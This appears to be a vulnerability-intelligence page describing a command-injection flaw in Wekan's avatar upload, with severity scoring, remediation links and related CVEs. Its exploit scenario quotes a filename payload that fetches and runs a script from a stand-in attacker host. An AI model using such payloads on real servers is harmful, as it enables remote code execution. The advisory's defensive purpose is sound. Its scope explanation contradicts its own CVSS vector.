Wekan
CVE-2026-52891
CRITICAL
Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Network-reachable upload with low complexity but requires a valid account (PR:L); command execution runs as the app process within one authority so scope Unchanged, giving full C/I/A impact.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
Wekan is open source kanban built with Meteor. Prior to 9.07, Wekan avatar upload functionality embeds user-supplied filenames into paths later passed to child_process.exec() for MIME-type detection. Because models/avatars.js and models/fileValidation.js used a shell command with the avatar filename, shell metacharacters such as backticks and $() in the filename could execute commands on the server. This issue is fixed in version 9.07.
AnalysisAI
OS command injection in Wekan (the open-source Meteor-based kanban board) before version 9.07 lets an authenticated user execute arbitrary commands on the server by uploading an avatar with shell metacharacters in its filename. The user-supplied filename is embedded into a shell string passed to child_process.exec() for MIME-type detection in models/avatars.js and models/fileValidation.js, so backticks or $() in the name run as server-side commands. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires an authenticated Wekan user account with access to the avatar upload feature (per CVSS PR:L). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Signals are largely consistent toward high severity but with an important access caveat. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who holds any authenticated Wekan account navigates to their profile and uploads an avatar image whose filename contains a shell payload, e.g. `$(curl attacker.tld/x|sh).png` or a backtick-wrapped command. … |
| Remediation | Vendor-released patch: upgrade to Wekan 9.07 or later (https://github.com/wekan/wekan/releases/tag/v9.07), which sanitizes avatar filenames to an allowlist and replaces the shell-based exec() call with execFile() so no shell is invoked (fix commit https://github.com/wekan/wekan/commit/a4c74a5980e9f778eb444fd346f32aa3d16786a9; advisory https://github.com/wekan/wekan/security/advisories/GHSA-35j7-h385-2q9g). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: identify all Wekan deployments in use and audit which user accounts have avatar upload permissions. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
packages/wekan-ldap/server/ldap.js in Wekan before 4.87 can process connections even though they are not authorized by t
Authentication bypass in Wekan (open-source Meteor kanban) before version 9.46 lets an unauthenticated attacker imperson
A stored cross-site scripting (Stored XSS) vulnerability in file preview in WeKan before 6.75 allows remote authenticate
Wekan, open source kanban board system, between version 3.12 and 4.11, is vulnerable to multiple stored cross-site scrip
Account takeover in Wekan (open-source Meteor kanban) before 9.32 allows an attacker who controls an OIDC provider accou
LDAP filter injection in WeKan before 8.19 allows remote unauthenticated attackers to manipulate LDAP search filters and
Privilege escalation in WeKan (versions prior to 8.35) allows authenticated board members with low privileges to perform
Improper access control in Wekan (self-hosted open-source Meteor kanban) before version 9.37 lets any authenticated user
Wekan versions 8.31.0 through 8.33 expose webhook URLs and authentication tokens to all board members through unfiltered
Server-Side Request Forgery in Wekan 8.32-8.33 allows authenticated users to force the server to make arbitrary HTTP req
Privilege escalation in Wekan (self-hosted Meteor kanban) before 9.32 lets any authenticated user directly invoke OIDC-o
Wekan versions 8.31.0 through 8.33 expose global webhook configurations including sensitive URLs and authentication toke
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today